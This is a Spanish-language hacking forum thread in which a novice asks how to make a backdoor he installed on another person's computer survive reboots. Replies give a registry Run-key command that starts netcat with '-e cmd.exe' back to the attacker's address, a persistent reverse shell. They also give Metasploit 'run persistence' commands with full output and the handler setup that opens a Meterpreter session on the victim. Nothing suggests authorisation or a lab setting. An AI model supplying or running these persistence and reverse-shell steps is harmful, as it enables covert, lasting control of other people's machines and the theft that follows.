[SOLUCIONADO] Backdoor autorun ayuda!!!

Iniciado por pelumon, Octubre 01, 2013, 07:56:18 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 01, 2013, 07:56:18 PM Ultima modificación: Agosto 08, 2014, 08:17:04 PM por Expermicid
que tal banda bueno pues les cuanto que pude crear un backdoor e instalarlo en otra maquina con red diferente y todo marcha bien, lo que quiero saber es como lo instalo para que inicie en procesos cada que se prenda y apague la computadora ya intente con run presistence pero lo que no se es si se pone la ip de la maquina victima la externa o la local ya que en armitage me salen las 2, de echo eh intentado con las 2 pero no eh tenid exito gracias bandda salu2.....

Lo que podes hacer si ya tenes acceso a la maquina remota es decargar netcat y agregar la siguiente entrada al registro de windows para que el binario se ejecute cada vez que la maquina se inicie

Código: dos
reg add HKLM\SOFTWARE\microsoft\windows\currentversion\run /v backdoor /d "/ruta/nc.exe -vv tuip puerto -e cmd.exe"


Reemplaza /ruta/nc.exe por el destino original donde se va a encontrar el netcat, asi mismo con "tuip" y "puerto" por los valores correspondientes, Luego te pones a escuchar para obtener la shell inversa.



Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Twitter: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

me comunico con la maquina con netcat y esto me abrira la sell?? pero despues, hehehe perdon aun soy novato

Antes de cerrar la sesión de meterpreter tenias que subir el troyano, exe, payload o como le quieras llamar, para que cuando entres a la shell, lo ejecutes, y se te abra la sesión.

Skype: trollmine99

yo creo que tienes que poner la ip atacante no la víctima

escribe run persistence -h para ver las opciones
escribiré run persistence -U -i 5 -p PUERTO -r IP

meterpreter > run persistence -U -i 5 -p 4444 -r 192.168.254.128
  • Running Persistance Script
  • Resource file for cleanup created at /root/.msf4/logs/persistence/DARKAN-PC_20131004.1419/DARKAN-PC_20131004.1419.rc
  • Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.254.128 LPORT=4444
  • Persistent agent script is 613979 bytes long
  • Persistent Script written to C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Executing script C:\Users\Darkan\AppData\Local\Temp\SvTZOaDOD.vbs
  • Agent executed with PID 6836
  • Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz
  • Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cWizKCJgKCz

    reiniciar..

    msf > use exploit/multi/handler
    msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf  exploit(handler) > set LHOST 192.168.254.128
    LHOST => 192.168.254.128
    msf  exploit(handler) > set LPORT 4444
    LPORT => 4444
    msf  exploit(handler) > exploit
  • Started reverse handler on 192.168.254.128:4444
  • Starting the payload handler...
  • Sending stage (752128 bytes) to 192.168.254.1
  • Meterpreter session 1 opened (192.168.254.128:4444 -> 192.168.254.1:7510) at 2013-10-04 16:19:33 -0400

    meterpreter >

    y listo

Si la pc victima esta encendida primero que la atante aun Asi se puede conectar o nesesita primero estar exploit ?